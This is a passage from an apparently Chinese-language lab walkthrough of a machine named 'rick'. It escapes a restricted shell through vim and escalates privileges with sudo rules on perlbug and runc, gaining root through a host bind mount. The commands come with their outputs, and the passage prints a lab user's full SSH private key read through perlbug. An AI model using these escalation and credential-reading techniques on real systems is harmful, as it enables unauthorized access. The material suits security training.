bash<\/code><\/pre>\n\u53d1\u73b0\u8fd9\u4e2a\u6587\u4ef6\u8def\u5f84\u88ab\u79fb\u5230\u53e6\u4e00\u5904\u73af\u5883\u53d8\u91cf\u4e0a\u53bb\u4e86\uff1a<\/p>\n
morty@rick:~$ echo $SHELL\n\/bin\/rbash\nmorty@rick:~$ vim -c ':!\/usr\/bin\/bash'\n\n\/bin\/rbash: \/usr\/bin\/bash: restricted: cannot specify `\/' in command names\n\nshell returned 1\n\nPress ENTER or type command to continue\nmorty@rick:~$ echo $SHELL\n\/bin\/rbash\nmorty@rick:~$ vim -c ':!bash'\n\nmorty@rick:~$ echo $SHELL\n\/bin\/rbash<\/code><\/pre>\n\u7a81\u7136\u53d1\u73b0\u4e0d\u53d7\u9650\u5236\u4e86\uff1a<\/p>\n
morty@rick:~$ ls -la\ntotal 36\ndrwxr-xr-x 4 morty morty 4096 Jul 16 03:26 .\ndrwxr-xr-x 4 root root 4096 Nov 24 2021 ..\nlrwxrwxrwx 1 root root 9 Nov 24 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 morty morty 220 Nov 24 2021 .bash_logout\n-rw-r--r-- 1 morty morty 3526 Nov 24 2021 .bashrc\ndrwx------ 3 morty morty 4096 Nov 24 2021 .gnupg\n-rw-r--r-- 1 rick rick 107 Nov 24 2021 .important\n-rw-r--r-- 1 morty morty 807 Nov 24 2021 .profile\ndrwx------ 2 morty morty 4096 Nov 24 2021 .ssh\n-rw------- 1 morty morty 839 Jul 16 03:26 .viminfo\nmorty@rick:~$ cd \/\nmorty@rick:\/$<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n
morty@rick:\/$ sudo -u rick \/usr\/bin\/perlbug -s 'x x x' -r x -c x -e 'exec \/bin\/bash;'\nThis program provides an easy way to create a message reporting\na bug in the core perl distribution (along with tests or\npatches) to the volunteers who maintain perl at\nperlbug@perl.org. To send a thank-you note to perl-\nthanks@perl.org instead of a bug report, please run\n'perlthanks'.\n\nPlease do not use \/usr\/bin\/perlbug to send test messages, test\nwhether perl works, or to report bugs in perl modules from CPAN.\n\nSuggestions for how to find help using Perl can be found at\nhttp:\/\/perldoc.perl.org\/perlcommunity.html\n\nIf your bug is about a Perl module rather than a core language\nfeature, please enter its name here. If it's not, just hit Enter\nto skip this question.\n\nModule: \n\nPlease pick a category from the following list:\n\n core docs install library utilities\n\nCategory [core]: \n\nPlease pick a severity from the following list:\n\n critical high medium low wishlist none\n\nSeverity [low]: \nrick@rick:\/$ whoami;id\nrick\nuid=1000(rick) gid=1000(rick) groups=1000(rick)<\/code><\/pre>\n\u63d0\u6743\u6210\u529f\uff01<\/p>\n
runc\u63d0\u6743root<\/h3>\nrick@rick:\/$ cd ~\nrick@rick:~$ ls -la\ntotal 36\ndrwxr-xr-x 5 rick rick 4096 Nov 24 2021 .\ndrwxr-xr-x 4 root root 4096 Nov 24 2021 ..\nlrwxrwxrwx 1 root root 9 Nov 24 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 rick rick 220 Nov 24 2021 .bash_logout\n-rw-r--r-- 1 rick rick 3526 Nov 24 2021 .bashrc\ndrwx------ 3 rick rick 4096 Nov 24 2021 .gnupg\ndrwxr-xr-x 3 rick rick 4096 Nov 24 2021 .local\n-rw-r--r-- 1 rick rick 807 Nov 24 2021 .profile\ndrwx------ 2 rick rick 4096 Nov 24 2021 .ssh\n-rwx------ 1 rick rick 36 Nov 24 2021 user.txt\nrick@rick:~$ cat user.txt \na52d68b19ebca39c7b821ab1a51fef2e -\nrick@rick:~$ sudo -l\nMatching Defaults entries for rick on rick:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser rick may run the following commands on rick:\n (ALL : ALL) NOPASSWD: \/usr\/sbin\/runc\nrick@rick:~$ file \/usr\/sbin\/runc\n\/usr\/sbin\/runc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter \/lib\/ld-linux.so.2, for GNU\/Linux 3.2.0, Go BuildID=v9KnpAr_z7Yq7ynp0kxy\/Z0y3KsZB_zHn9j5Rprf6\/2kcKjaL8lQCM6nVR8R7u\/TV1B2Vmmo5gHdzqOJJ9i, BuildID[sha1]=8e109adbf7464ff1d68ad77a562737048d1a72fc, stripped\nrick@rick:~$ \/usr\/sbin\/runc\nNAME:\n runc - Open Container Initiative runtime\n\nrunc is a command line client for running applications packaged according to\nthe Open Container Initiative (OCI) format and is a compliant implementation of the\nOpen Container Initiative specification.\n\nrunc integrates well with existing process supervisors to provide a production\ncontainer runtime environment for applications. It can be used with your\nexisting process monitoring tools and the container will be spawned as a\ndirect child of the process supervisor.\n\nContainers are configured using bundles. A bundle for a container is a directory\nthat includes a specification file named "config.json" and a root filesystem.\nThe root filesystem contains the contents of the container.\n\nTo start a new instance of a container:\n\n # runc run [ -b bundle ] <container-id>\n\nWhere "<container-id>" is your name for the instance of the container that you\nare starting. The name you provide for the container instance must be unique on\nyour host. Providing the bundle directory using "-b" is optional. The default\nvalue for "bundle" is the current directory.\n\nUSAGE:\n runc [global options] command [command options] [arguments...]\n\nVERSION:\n 1.0.0~rc6+dfsg1\ncommit: 1.0.0~rc6+dfsg1-3\nspec: 1.0.1\n\nCOMMANDS:\n checkpoint checkpoint a running container\n create create a container\n delete delete any resources held by the container often used with detached container\n events display container events such as OOM notifications, cpu, memory, and IO usage statistics\n exec execute new process inside the container\n init initialize the namespaces and launch the process (do not call it outside of runc)\n kill kill sends the specified signal (default: SIGTERM) to the container's init process\n list lists containers started by runc with the given root\n pause pause suspends all processes inside the container\n ps ps displays the processes running inside a container\n restore restore a container from a previous checkpoint\n resume resumes all processes that have been previously paused\n run create and run a container\n spec create a new specification file\n start executes the user defined process in a created container\n state output the state of a container\n update update container resource constraints\n help, h Shows a list of commands or help for one command\n\nGLOBAL OPTIONS:\n --debug enable debug output for logging\n --log value set the log file path where internal debug information is written (default: "\/dev\/null")\n --log-format value set the format used by logs ('text' (default), or 'json') (default: "text")\n --root value root directory for storage of container state (this should be located in tmpfs) (default: "\/run\/runc")\n --criu value path to the criu binary used for checkpoint and restore (default: "criu")\n --systemd-cgroup enable systemd cgroup support, expects cgroupsPath to be of form "slice:prefix:name" for e.g. "system.slice:runc:434234"\n --rootless value ignore cgroup permission errors ('true', 'false', or 'auto') (default: "auto")\n --help, -h show help\n --version, -v print the version<\/code><\/pre>\n\u627e\u4e00\u4e0b\u6f0f\u6d1e\uff0c\u53d1\u73b0\uff1ahttps:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/runc-privilege-escalation<\/a><\/p>\n<\/div><\/p>\n\u770b\u4e00\u4e0b\uff1a<\/p>\n
runc -help #Get help and see if runc is intalled\nrunc spec #This will create the config.json file in your current folder\n\nInside the "mounts" section of the create config.json add the following lines:\n{\n "type": "bind",\n "source": "\/",\n "destination": "\/",\n "options": [\n "rbind",\n "rw",\n "rprivate"\n ]\n},\n\n#Once you have modified the config.json file, create the folder rootfs in the same directory\nmkdir rootfs\n\n# Finally, start the container\n# The root folder is the one from the host\nrunc run demo<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u63d0\u6743\uff0c\u5c06\u4ee3\u7801\u63d2\u5165config.json<\/code>\uff0c\u5c06\u6307\u5b9a\u4ee3\u7801\u6bb5\u63d2\u5165mount<\/code>\u4e0b\u4e00\u4e2a\u4f4d\u7f6e\uff1a<\/p>\nrick@rick:\/tmp$ diff config.json \/home\/rick\/config.json \n65,74d64\n< "type": "bind",\n< "source": "\/",\n< "destination": "\/",\n< "options": [\n< "rbind",\n< "rw",\n< "rprivate"\n< ]\n< },\n< {\n188c178\n< }\n---\n> }<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n
rick@rick:\/tmp$ mkdir rootfs\nrick@rick:\/tmp$ sudo -l\nMatching Defaults entries for rick on rick:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser rick may run the following commands on rick:\n (ALL : ALL) NOPASSWD: \/usr\/sbin\/runc\nrick@rick:\/tmp$ sudo \/usr\/sbin\/runc run demo\n# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)<\/code><\/pre>\n\u6210\u529f\uff01<\/p>\n
\u5176\u4ed6\u6536\u83b7<\/h2>\nperlbug\u63d0\u6743\u65b9\u6848<\/h3>\n
perlbug<\/code>\u90a3\u91cc\u4e5f\u770b\u5230\u5e08\u5085\u91c7\u7528\u4ee5\u4e0b\u65b9\u6cd5\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\nmorty@rick:\/$ sudo -u rick \/usr\/bin\/perlbug -f \/home\/rick\/.ssh\/id_rsa\nThis program provides an easy way to create a message reporting\na bug in the core perl distribution (along with tests or\npatches) to the volunteers who maintain perl at\nperlbug@perl.org. To send a thank-you note to perl-\nthanks@perl.org instead of a bug report, please run\n'perlthanks'.\n\nPlease do not use \/usr\/bin\/perlbug to send test messages, test\nwhether perl works, or to report bugs in perl modules from CPAN.\n\nSuggestions for how to find help using Perl can be found at\nhttp:\/\/perldoc.perl.org\/perlcommunity.html\n\nFirst of all, please provide a subject for the message.\nThis should be a concise description of your bug or problem\nwhich will help the volunteers working to improve perl to\ncategorize and resolve the issue. Be as specific and\ndescriptive as you can. A subject like "perl bug" or "perl\nproblem" will make it much less likely that your issue gets the\nattention it deserves.\n\nSubject: aaa a # \u5fc5\u987b\u5b58\u5728\u7a7a\u683c\nPerl's developers may need your email address to contact you for\nfurther information about your issue or to inform you when it is\nresolved. If the default shown is not your email address,\nplease correct it.\n\nYour address [rick@rick]: # \u4e00\u8def\u56de\u8f66\u4e00\u76f4\u5230Action\u7684\u65f6\u5019\u4f7f\u7528Display\u663e\u793a\u5c31\u884c\u4e86\uff01\n\n\/usr\/bin\/perlbug can send a copy of this report to your local\nperl administrator. If the address below is wrong, please\ncorrect it, or enter 'none' or 'yourself' to not send a copy.\n\nLocal perl administrator [root@localhost]: \n\nIf your bug is about a Perl module rather than a core language\nfeature, please enter its name here. If it's not, just hit Enter\nto skip this question.\n\nModule: \n\nPlease pick a category from the following list:\n\n core docs install library utilities\n\nCategory [core]: \n\nPlease pick a severity from the following list:\n\n critical high medium low wishlist none\n\nSeverity [low]: \n\nYou have finished composing your message. At this point, you have \na few options. You can:\n\n * [Se]nd the message to perlbug@perl.org and root@localhost, \n * [D]isplay the message on the screen,\n * [R]e-edit the message\n * Display or change the message's [su]bject\n * Save the message to a [f]ile to mail at another time\n * [Q]uit without sending a message\n\nAction (Send\/Display\/Edit\/Subject\/Save to File): D\n\nThis is a bug report for perl from rick@rick,\ngenerated with the help of perlbug 1.41 running under perl 5.28.1.\n\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAw0gSyTcBji1NBL5\/yc1JVZMCEm8JMw7yH+pW+20XOM4\/TaozgiXe\neyMjoXXKbNhPHEUmW+B0Ot3ee4C5PG\/aUGyuCPW0VIGa0IBCuygjKCVG\/w6cKAjSPWakOM\n\/RFhqunKY+ZPvR\/4rklU4ekacV\/6ehNw9ti6O+UZIj0FoqNV1rYcC2xMwL2uV+dvHUnZA+\nFqEwvrmNR7ZFRUFJdQZdC99cW4ZpzP5ogdxVORS4+3Ac2D8vML2hzaOuVpUX3KBEsZWDrB\no56EN5v6mFqYA2c\/KsZ+Ot7EHAQly0MsSFYUk9zVIbe9LfKHNZfB9ngilRoRymOwoyPKDd\nq1MQg2PdIwAAA8jZ7Oin2ezopwAAAAdzc2gtcnNhAAABAQDDSBLJNwGOLU0Evn\/JzUlVkw\nISbwkzDvIf6lb7bRc4zj9NqjOCJd57IyOhdcps2E8cRSZb4HQ63d57gLk8b9pQbK4I9bRU\ngZrQgEK7KCMoJUb\/DpwoCNI9ZqQ4z9EWGq6cpj5k+9H\/iuSVTh6RpxX\/p6E3D22Lo75Rki\nPQWio1XWthwLbEzAva5X528dSdkD4WoTC+uY1HtkVFQUl1Bl0L31xbhmnM\/miB3FU5FLj7\ncBzYPy8wvaHNo65WlRfcoESxlYOsGjnoQ3m\/qYWpgDZz8qxn463sQcBCXLQyxIVhST3NUh\nt70t8oc1l8H2eCKVGhHKY7CjI8oN2rUxCDY90jAAAAAwEAAQAAAQBCgRYcvoXiFJ1pIzND\n14zE\/uayvmvEnq9onRb4U0OYTe0TFwapqRnml6X3w7SnctcmSopwubT7ozm0l7b91R3lS8\n3NMVgze1vs6\/FN6bJnZqKSFDisDa0DyiPdUTDktTuID7mqDHSM8ZE9I7iXY+7C\/SSTKsbk\nymPzRbC6sSo0t72jepvLUvs4QC+P4Y63qftzXezWXNU+BLqhHeMoqIOBGbA8xAcH+jXmko\n7SE7RV9QOjGj0I967VA6FVP3kshCjq4ETXP8pcyLKfq5HvlmbpqiKs6lsh2h4PLVaDfnZX\nxxXko4jckmLZ37ZbXQ4enK\/0lQNvUh0wJBWbaivHIEoBAAAAgHMlQR6cXJQe8rFmCu8Aru\n4kwKR3Egc7pMQYPGl7lQrX7o4osbcODFVXM96TL9cxxiy+yPQsbbUJ4yYUH5oeBh\/sUgAv\nFxKVrCpEV5loJ9\/FFQHx6DnhzDy5hixB+znnbliBsDkFIPlI8MFY70ZxBm5mTLN4OFVO\/J\nallMKzTL\/9AAAAgQD6rDTmCuPvEs5HVGFhRQwAbXCKA4zAQ9zkwfRid3Dlz6AkoIw7t7+q\nw8x+Q\/hiidhjtVY4K375Z5Ircmg\/b42t+iJs671Ob3ubgdF\/fQfzD8G4APxb2lZXmAIbJ6\nP1M9sb3z3ujNv\/UYcWRL+kwtnHLU9b3C6MRcXNkRTmQLBMIwAAAIEAx26CYkJJwx4ZlJG7\nCDCmbofgcFwdcm0iDiXzg1gQN2LRiYeQwtl13h0HUwts5geYDIuTXMTX+vDOB23aNdmHkR\niKmCCrcr4yX9NyCXa8BcYEyoY0eqMdtL4uWZTk67qHol0AMF+NLztzj4OiOV\/WE\/ayzlRh\nKlBx9Esbl5byuwEAAAAOcmlja0BzeW1mb25vczQBAgMEBQ==\n-----END OPENSSH PRIVATE KEY-----\n---\nFlags:\n category=core\n severity=low\n---\nSite configuration information for perl 5.28.1:\n\nConfigured by Debian at Tue Jul 21 19:27:00 UTC 2020.\n\nSummary of my perl5 (revision 5 version 28 subversion 1) configuration:\n\n Platform:\n osname=linux\n osvers=4.9.0\n archname=i686-linux-gnu-thread-multi-64int\n uname='linux localhost 4.9.0 #1 smp debian 4.9.0 i686 gnulinux '\n config_args='-Dusethreads -Duselargefiles -Dcc=i686-linux-gnu-gcc -Dcpp=i686-linux-gnu-cpp -Dld=i686-linux-gnu-gcc -Dccflags=-DDEBIAN -Wdate-time -D_FORTIFY_SOURCE=2 -g -O2 -fdebug-prefix-map=\/build\/perl-f1blUn\/perl-5.28.1=. -fstack-protector-strong -Wformat -Werror=format-security -Dldflags= -Wl,-z,relro -Dlddlflags=-shared -Wl,-z,relro -Dcccdlflags=-fPIC -Darchname=i686-linux-gnu -Dprefix=\/usr -Dprivlib=\/usr\/share\/perl\/5.28 -Darchlib=\/usr\/lib\/i386-linux-gnu\/perl\/5.28 -Dvendorprefix=\/usr -Dvendorlib=\/usr\/share\/perl5 -Dvendorarch=\/usr\/lib\/i386-linux-gnu\/perl5\/5.28 -Dsiteprefix=\/usr\/local -Dsitelib=\/usr\/local\/share\/perl\/5.28.1 -Dsitearch=\/usr\/local\/lib\/i386-linux-gnu\/perl\/5.28.1 -Dman1dir=\/usr\/share\/man\/man1 -Dman3dir=\/usr\/share\/man\/man3 -Dsiteman1dir=\/usr\/local\/man\/man1 -Dsiteman3dir=\/usr\/local\/man\/man3 -Duse64bitint -Dman1ext=1 -Dman3ext=3perl -Dpager=\/usr\/bin\/sensible-pager -Uafs\n-Ud_csh -Ud_ualarm -Uusesfio -Uusenm -Ui_libutil -Ui_xlocale -Uversiononly -DDEBUGGING=-g -Doptimize=-O2 -dEs -Duseshrplib -Dlibperl=libperl.so.5.28.1'\n hint=recommended\n useposix=true\n d_sigaction=define\n useithreads=define\n usemultiplicity=define\n use64bitint=define\n use64bitall=undef\n uselongdouble=undef\n usemymalloc=n\n default_inc_excludes_dot=define\n bincompat5005=undef\n Compiler:\n cc='i686-linux-gnu-gcc'\n ccflags ='-D_REENTRANT -D_GNU_SOURCE -DDEBIAN -fwrapv -fno-strict-aliasing -pipe -I\/usr\/local\/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64'\n optimize='-O2 -g'\n cppflags='-D_REENTRANT -D_GNU_SOURCE -DDEBIAN -fwrapv -fno-strict-aliasing -pipe -I\/usr\/local\/include'\n ccversion=''\n gccversion='8.3.0'\n gccosandvers=''\n intsize=4\n longsize=4\n ptrsize=4\n doublesize=8\n byteorder=12345678\n doublekind=3\n d_longlong=define\n longlongsize=8\n d_longdbl=define\n longdblsize=12\n longdblkind=3\n ivtype='long long'\n ivsize=8\n nvtype='double'\n nvsize=8\n Off_t='off_t'\n lseeksize=8\n alignbytes=4\n prototype=define\n Linker and Libraries:\n ld='i686-linux-gnu-gcc'\n ldflags =' -fstack-protector-strong -L\/usr\/local\/lib'\n libpth=\/usr\/local\/lib \/usr\/lib\/gcc\/i686-linux-gnu\/8\/include-fixed \/usr\/include\/i386-linux-gnu \/usr\/lib \/lib\/i386-linux-gnu \/lib\/..\/lib \/usr\/lib\/i386-linux-gnu \/usr\/lib\/..\/lib \/lib\n libs=-lgdbm -lgdbm_compat -ldb -ldl -lm -lpthread -lc -lcrypt\n perllibs=-ldl -lm -lpthread -lc -lcrypt\n libc=libc-2.28.so\n so=so\n useshrplib=true\n libperl=libperl.so.5.28\n gnulibc_version='2.28'\n Dynamic Linking:\n dlsrc=dl_dlopen.xs\n dlext=so\n d_dlsymun=undef\n ccdlflags='-Wl,-E'\n cccdlflags='-fPIC'\n lddlflags='-shared -L\/usr\/local\/lib -fstack-protector-strong'\n\nLocally applied patches:\n DEBPKG:debian\/cpan_definstalldirs - Provide a sensible INSTALLDIRS default for modules installed from CPAN.\n DEBPKG:debian\/db_file_ver - https:\/\/bugs.debian.org\/340047 Remove overly restrictive DB_File version check.\n DEBPKG:debian\/doc_info - Replace generic man(1) instructions with Debian-specific information.\n DEBPKG:debian\/enc2xs_inc - https:\/\/bugs.debian.org\/290336 Tweak enc2xs to follow symlinks and ignore missing @INC directories.\n DEBPKG:debian\/errno_ver - https:\/\/bugs.debian.org\/343351 Remove Errno version check due to upgrade problems with long-running processes.\n DEBPKG:debian\/libperl_embed_doc - https:\/\/bugs.debian.org\/186778 Note that libperl-dev package is required for embedded linking\n DEBPKG:fixes\/respect_umask - Respect umask during installation\n DEBPKG:debian\/writable_site_dirs - Set umask approproately for site install directories\n DEBPKG:debian\/extutils_set_libperl_path - EU:MM: set location of libperl.a under \/usr\/lib\n DEBPKG:debian\/no_packlist_perllocal - Don't install .packlist or perllocal.pod for perl or vendor\n DEBPKG:debian\/fakeroot - Postpone LD_LIBRARY_PATH evaluation to the binary targets.\n DEBPKG:debian\/instmodsh_doc - Debian policy doesn't install .packlist files for core or vendor.\n DEBPKG:debian\/ld_run_path - Remove standard libs from LD_RUN_PATH as per Debian policy.\n DEBPKG:debian\/libnet_config_path - Set location of libnet.cfg to \/etc\/perl\/Net as \/usr may not be writable.\n DEBPKG:debian\/perlivp - https:\/\/bugs.debian.org\/510895 Make perlivp skip include directories in \/usr\/local\n DEBPKG:debian\/squelch-locale-warnings - https:\/\/bugs.debian.org\/508764 Squelch locale warnings in Debian package maintainer scripts\n DEBPKG:debian\/patchlevel - https:\/\/bugs.debian.org\/567489 List packaged patches for 5.28.1-6+deb10u1 in patchlevel.h\n DEBPKG:fixes\/document_makemaker_ccflags - https:\/\/bugs.debian.org\/628522 [rt.cpan.org #68613] Document that CCFLAGS should include $Config{ccflags}\n DEBPKG:debian\/find_html2text - https:\/\/bugs.debian.org\/640479 Configure CPAN::Distribution with correct name of html2text\n DEBPKG:debian\/perl5db-x-terminal-emulator.patch - https:\/\/bugs.debian.org\/668490 Invoke x-terminal-emulator rather than xterm in perl5db.pl\n DEBPKG:debian\/cpan-missing-site-dirs - https:\/\/bugs.debian.org\/688842 Fix CPAN::FirstTime defaults with nonexisting site dirs if a parent is writable\n DEBPKG:fixes\/memoize_storable_nstore - [rt.cpan.org #77790] https:\/\/bugs.debian.org\/587650 Memoize::Storable: respect 'nstore' option not respected\n DEBPKG:debian\/makemaker-pasthru - https:\/\/bugs.debian.org\/758471 Pass LD settings through to subdirectories\n DEBPKG:debian\/makemaker-manext - https:\/\/bugs.debian.org\/247370 Make EU::MakeMaker honour MANnEXT settings in generated manpage headers\n DEBPKG:debian\/kfreebsd-softupdates - https:\/\/bugs.debian.org\/796798 Work around Debian Bug#796798\n DEBPKG:fixes\/autodie-scope - https:\/\/bugs.debian.org\/798096 Fix a scoping issue with "no autodie" and the "system" sub\n DEBPKG:fixes\/memoize-pod - [rt.cpan.org #89441] Fix POD errors in Memoize\n DEBPKG:debian\/hurd-softupdates - https:\/\/bugs.debian.org\/822735 Fix t\/op\/stat.t failures on hurd\n DEBPKG:fixes\/math_complex_doc_great_circle - https:\/\/bugs.debian.org\/697567 [rt.cpan.org #114104] Math::Trig: clarify definition of great_circle_midpoint\n DEBPKG:fixes\/math_complex_doc_see_also - https:\/\/bugs.debian.org\/697568 [rt.cpan.org #114105] Math::Trig: add missing SEE ALSO\n DEBPKG:fixes\/math_complex_doc_angle_units - https:\/\/bugs.debian.org\/731505 [rt.cpan.org #114106] Math::Trig: document angle units\n DEBPKG:fixes\/cpan_web_link - https:\/\/bugs.debian.org\/367291 CPAN: Add link to main CPAN web site\n DEBPKG:debian\/hppa_op_optimize_workaround - https:\/\/bugs.debian.org\/838613 Temporarily lower the optimization of op.c on hppa due to gcc-6 problems\n DEBPKG:debian\/installman-utf8 - https:\/\/bugs.debian.org\/840211 Generate man pages with UTF-8 characters\n DEBPKG:fixes\/getopt-long-4 - https:\/\/bugs.debian.org\/864544 [rt.cpan.org #122068] Fix issue #122068.\n DEBPKG:debian\/hppa_opmini_optimize_workaround - https:\/\/bugs.debian.org\/869122 Lower the optimization level of opmini.c on hppa\n DEBPKG:debian\/sh4_op_optimize_workaround - https:\/\/bugs.debian.org\/869373 Also lower the optimization level of op.c and opmini.c on sh4\n DEBPKG:debian\/perldoc-pager - https:\/\/bugs.debian.org\/870340 [rt.cpan.org #120229] Fix perldoc terminal escapes when sensible-pager is less\n DEBPKG:debian\/prune_libs - https:\/\/bugs.debian.org\/128355 Prune the list of libraries wanted to what we actually need.\n DEBPKG:debian\/mod_paths - Tweak @INC ordering for Debian\n DEBPKG:debian\/configure-regen - https:\/\/bugs.debian.org\/762638 Regenerate Configure et al. after probe unit changes\n DEBPKG:debian\/deprecate-with-apt - https:\/\/bugs.debian.org\/747628 Point users to Debian packages of deprecated core modules\n DEBPKG:debian\/disable-stack-check - https:\/\/bugs.debian.org\/902779 [perl #133327] Disable debugperl stack extension checks for binary compatibility with perl\n DEBPKG:debian\/gdbm-fatal - [perl #133295] https:\/\/bugs.debian.org\/904005 Temporarily skip GDBM_File fatal.t for gdbm >= 1.15 compatibility\n DEBPKG:fixes\/storable-recursion - https:\/\/bugs.debian.org\/912900 [perl #133326] [120060c] (perl #133326) fix and clarify handling of recurs_sv.\n DEBPKG:fixes\/caretx-fallback - https:\/\/bugs.debian.org\/913347 [perl #133573] [03b94aa] RT#133573: $^X fallback when platform-specific technique fails\n DEBPKG:fixes\/eumm-usrmerge - https:\/\/bugs.debian.org\/913637 Avoid mangling \/bin non-perl shebangs on merged-\/usr systems\n DEBPKG:fixes\/errno-include-path - [6c5080f] [perl #133662] https:\/\/bugs.debian.org\/875921 Make Errno_pm.PL compatible with \/usr\/include\/<ARCH>\/errno.h\n DEBPKG:fixes\/kfreebsd-renameat - [a3c63a9] https:\/\/bugs.debian.org\/912521 [perl #133668] Also work around renameat() kernel bug on GNU\/kFreeBSD\n DEBPKG:fixes\/time-local-2020 - https:\/\/bugs.debian.org\/915209 [rt.cpan.org #124787] Fix Time::Local tests\n DEBPKG:fixes\/inplace-editing-bugfix\/part1 - https:\/\/bugs.debian.org\/914651 (perl #133659) move argvout cleanup to a new function\n DEBPKG:fixes\/inplace-editing-bugfix\/part2 - https:\/\/bugs.debian.org\/914651 (perl #133659) tests for global destruction handling of inplace editing\n DEBPKG:fixes\/inplace-editing-bugfix\/part3 - https:\/\/bugs.debian.org\/914651 (perl #133659) make an in-place edit successful if the exit status is zero\n DEBPKG:fixes\/fix-manifest-failures - https:\/\/bugs.debian.org\/914962 Fix t\/porting\/manifest.t failures when run in a foreign git checkout\n DEBPKG:fixes\/pipe-open-bugfix\/part1 - [perl #133726] https:\/\/bugs.debian.org\/916313 Always mark pipe in pipe-open as inherit-on-exec\n DEBPKG:fixes\/pipe-open-bugfix\/part2 - [perl #133726] https:\/\/bugs.debian.org\/916313 Always mark pipe in list pipe-open as inherit-on-exec\n DEBPKG:fixes\/storable-probing\/prereq1 - [3f4cad1] Storable: fix for strawberry build failures:\n DEBPKG:fixes\/storable-probing\/prereq2 - [perl #133411] [edf639f] (perl #133411) don't try to load Storable with -Dusecrosscompile\n DEBPKG:fixes\/storable-probing\/disable-probing - https:\/\/bugs.debian.org\/914133 [perl #133708] [2a0bbd3] (perl #133708) remove build-time probing for stack limits for Storable\n DEBPKG:debian\/perlbug-editor - https:\/\/bugs.debian.org\/922609 Use "editor" as the default perlbug editor, as per Debian policy\n DEBPKG:fixes\/posix-mbrlen - [25d7b7a] https:\/\/bugs.debian.org\/924517 [perl #133928] Fix POSIX::mblen mbstate_t initialization on threaded perls with glibc\n DEBPKG:fixes\/CVE-2020-10543 - https:\/\/bugs.debian.org\/962005 regcomp.c: Prevent integer overflow from nested regex quantifiers.\n DEBPKG:fixes\/CVE-2020-10878 - https:\/\/bugs.debian.org\/962005 study_chunk: extract rck_elide_nothing\n DEBPKG:fixes\/CVE-2020-12723 - https:\/\/bugs.debian.org\/962005 study_chunk: avoid mutating regexp program within GOSUB\n DEBPKG:fixes\/io-socket-ip-nov4 - https:\/\/bugs.debian.org\/962019 Fix test failures in IO::Socket::IP with an IPv6-only host\n\n---\n@INC for perl 5.28.1:\n \/etc\/perl\n \/usr\/local\/lib\/i386-linux-gnu\/perl\/5.28.1\n \/usr\/local\/share\/perl\/5.28.1\n \/usr\/lib\/i386-linux-gnu\/perl5\/5.28\n \/usr\/share\/perl5\n \/usr\/lib\/i386-linux-gnu\/perl\/5.28\n \/usr\/share\/perl\/5.28\n \/usr\/local\/lib\/site_perl\n \/usr\/lib\/i386-linux-gnu\/perl-base\n\n---\nEnvironment for perl 5.28.1:\n HOME=\/home\/rick\n LANG=en_US.UTF-8\n LANGUAGE (unset)\n LD_LIBRARY_PATH (unset)\n LOGDIR (unset)\n PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin\n PERL_BADLANG (unset)\n SHELL=\/bin\/bash\n\nYou have finished composing your message. At this point, you have \na few options. You can:\n\n * [Se]nd the message to perlbug@perl.org and root@localhost, \n * [D]isplay the message on the screen,\n * [R]e-edit the message\n * Display or change the message's [su]bject\n * Save the message to a [f]ile to mail at another time\n * [Q]uit without sending a message\n\nAction (Send\/Display\/Edit\/Subject\/Save to File): <\/code><\/pre>\n\u63d0\u6743root\u65b9\u6848\u4fee\u6b63<\/h3>\n
\u867d\u7136\u8fdb\u5165\u4e86rootshell\uff0c\u4f46\u662f\u53ea\u662f\u53ea\u8bfb\u6587\u4ef6\u7cfb\u7edf\uff0c\u53c2\u8003wp1\u4e2d\uff0crpj7\u6307\u51fa\uff0c\u53ea\u8981\u4fee\u6539\u4e00\u4e2a\u5185\u5bb9\u5c31\u53ef\u4ee5\u4f7f\u4e4b\u53d8\u4e3a\u53ef\u5199\u7684!<\/p>\n
# ls -la\ntotal 32\ndrwx------ 5 root root 4096 Nov 24 2021 .\ndrwxr-xr-x 18 root root 4096 Nov 24 2021 ..\nlrwxrwxrwx 1 root root 9 Nov 24 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwx------ 3 root root 4096 Nov 24 2021 .gnupg\ndrwxr-xr-x 3 root root 4096 Aug 19 2019 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\ndrwx------ 2 root root 4096 Nov 24 2021 .ssh\n-rwx------ 1 root root 36 Nov 24 2021 root.txt\n# cat root.txt\n256fdda9b4e714bf9f38a92750debf70 -\n# pwd\n\/root\n# touch aaa\ntouch: cannot touch 'aaa': Read-only file system<\/code><\/pre>\n\u4fee\u6539\u4e3a\uff1a<\/p>\n
